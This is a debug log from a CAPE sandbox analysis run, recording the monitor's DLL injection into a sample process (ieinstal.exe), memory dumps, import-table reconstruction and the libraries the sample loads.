2020-03-24 10:13:50,822 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,822 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:13:50,822 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:13:50,822 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\duser.dll
2020-03-24 10:13:50,822 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\duser.dll
2020-03-24 10:13:50,836 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:13:50,836 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:13:50,852 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:13:50,852 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:13:50,852 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x4AAD0000
2020-03-24 10:13:50,852 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x4AAD829A
2020-03-24 10:13:50,868 [root] DEBUG: Module image dump success
2020-03-24 10:13:50,868 [root] DEBUG: DumpProcessFixImports: Found IAT - 0x4aad0ffc, size: 0x3a4
2020-03-24 10:13:50,884 [root] DEBUG: IAT parsing finished, found 229 valid APIs, missed 0 APIs
2020-03-24 10:13:50,884 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:13:50,884 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:50,884 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:50,900 [root] DEBUG: Adding module to module list: winbrand.dll
2020-03-24 10:13:50,900 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:50,914 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:50,930 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:50,961 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\2444_103054258250132024232020
2020-03-24 10:13:51,305 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\2444.dmp.
2020-03-24 10:13:51,321 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:51,321 [root] DEBUG: DLL unloaded from 0x74940000.
2020-03-24 10:13:51,335 [root] INFO: Notified of termination of process with pid 2444.
2020-03-24 10:13:51,648 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:51,664 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:51,664 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:51,680 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:51,680 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:51,710 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:51,726 [root] DEBUG: Loader: Injecting process 1540 (thread 2160) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,742 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:51,742 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,757 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:51,757 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,773 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:51,835 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:51,835 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:51,835 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:51,851 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:51,851 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:51,851 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:51,867 [root] DEBUG: Loader: Injecting process 1540 (thread 2160) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,867 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:51,867 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,881 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:51,881 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,898 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:51,898 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:51,898 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:51,914 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:51,914 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:51,914 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:51,928 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:51,928 [root] DEBUG: Loader: Injecting process 1540 (thread 0) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,960 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2160, handle 0x9c
2020-03-24 10:13:51,960 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:51,960 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,976 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:51,992 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,992 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:52,006 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:52,006 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:52,006 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:52,006 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:52,023 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:52,023 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:52,023 [root] DEBUG: Loader: Injecting process 1540 (thread 0) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,038 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2160, handle 0x9c
2020-03-24 10:13:52,038 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:52,053 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,053 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:52,069 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,085 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:52,101 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:52,115 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:52,115 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:52,115 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:52,115 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:52,131 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:52,131 [root] DEBUG: Loader: Injecting process 1540 (thread 0) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,131 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2160, handle 0x9c
2020-03-24 10:13:52,148 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:52,148 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,148 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:52,163 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,163 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:52,163 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:52,163 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:52,178 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:52,178 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:52,178 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:52,178 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:52,194 [root] DEBUG: Loader: Injecting process 1540 (thread 1424) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,194 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:52,210 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00430000 (context EP 0x000F0000)
2020-03-24 10:13:52,210 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,210 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:52,210 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,226 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:52,335 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:52,335 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:52,349 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:52,349 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:52,349 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:52,349 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:52,365 [root] DEBUG: Loader: Injecting process 1540 (thread 0) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,365 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2160, handle 0x9c
2020-03-24 10:13:52,365 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:52,365 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,381 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:52,381 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,381 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:52,381 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:52,381 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:52,381 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:52,397 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:52,397 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:52,397 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:52,397 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:52,413 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:52,413 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:52,413 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:52,427 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:52,427 [root] DEBUG: Loader: Injecting process 1540 (thread 0) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,427 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2160, handle 0x9c
2020-03-24 10:13:52,444 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:52,444 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:52,444 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,444 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1540 at 0x74880000, image base 0x430000, stack from 0x386000-0x390000
2020-03-24 10:13:52,444 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:52,444 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Program Files (x86)\internet explorer\ieinstal.exe".
2020-03-24 10:13:52,444 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,460 [root] INFO: Added new process to list with pid: 1540
2020-03-24 10:13:52,460 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:52,460 [root] INFO: Monitor successfully loaded in process with pid 1540.
2020-03-24 10:13:52,460 [root] DEBUG: set_caller_info: Adding region at 0x000F0000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 10:13:52,490 [root] DEBUG: set_caller_info: Adding region at 0x002B0000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 10:13:52,506 [root] DEBUG: set_caller_info: Adding region at 0x00180000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 10:13:52,522 [root] DEBUG: set_caller_info: Adding region at 0x10530000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 10:13:52,538 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1964
2020-03-24 10:13:52,538 [root] DEBUG: GetHookCallerBase: thread 420 (handle 0x0), return address 0x035B6365, allocation base 0x035A0000.
2020-03-24 10:13:52,552 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\1964.dmp.
2020-03-24 10:13:52,552 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2020-03-24 10:13:52,552 [root] DEBUG: ApiReader: module list size: 28
2020-03-24 10:13:52,569 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,569 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:52,584 [root] DEBUG: DLL loaded at 0x73BD0000: C:\Windows\system32\MSVCP60 (0x66000 bytes).
2020-03-24 10:13:52,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:52,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,599 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2020-03-24 10:13:52,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,599 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2020-03-24 10:13:52,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,647 [root] DEBUG: DLL loaded at 0x72720000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus (0x190000 bytes).
2020-03-24 10:13:52,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,677 [root] DEBUG: set_caller_info: Adding region at 0x00400000 to caller regions list (msvcrt::memcpy).
2020-03-24 10:13:52,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,694 [root] DEBUG: set_caller_info: Adding region at 0x002D0000 to caller regions list (ntdll::NtClose).
2020-03-24 10:13:52,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,709 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,709 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-03-24 10:13:52,709 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,709 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-03-24 10:13:52,709 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,724 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\NLAapi (0x10000 bytes).
2020-03-24 10:13:52,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,724 [root] DEBUG: DLL loaded at 0x74BC0000: C:\Windows\system32\napinsp (0x10000 bytes).
2020-03-24 10:13:52,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,740 [root] DEBUG: DLL loaded at 0x74BA0000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2020-03-24 10:13:52,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,756 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-03-24 10:13:52,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,772 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\winrnr (0x8000 bytes).
2020-03-24 10:13:52,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,786 [root] DEBUG: DLL loaded at 0x73BB0000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-03-24 10:13:52,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,802 [root] DEBUG: DLL loaded at 0x73BA0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-03-24 10:13:52,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,006 [root] DEBUG: DLL loaded at 0x73B90000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-03-24 10:13:53,006 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,036 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:53,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:53,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,364 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,364 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,380 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,380 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,380 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:53,395 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:53,395 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:53,395 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:53,411 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:53,411 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:53,411 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:53,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:53,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,441 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:53,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,489 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,489 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:53,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,566 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,566 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,566 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,566 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,566 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
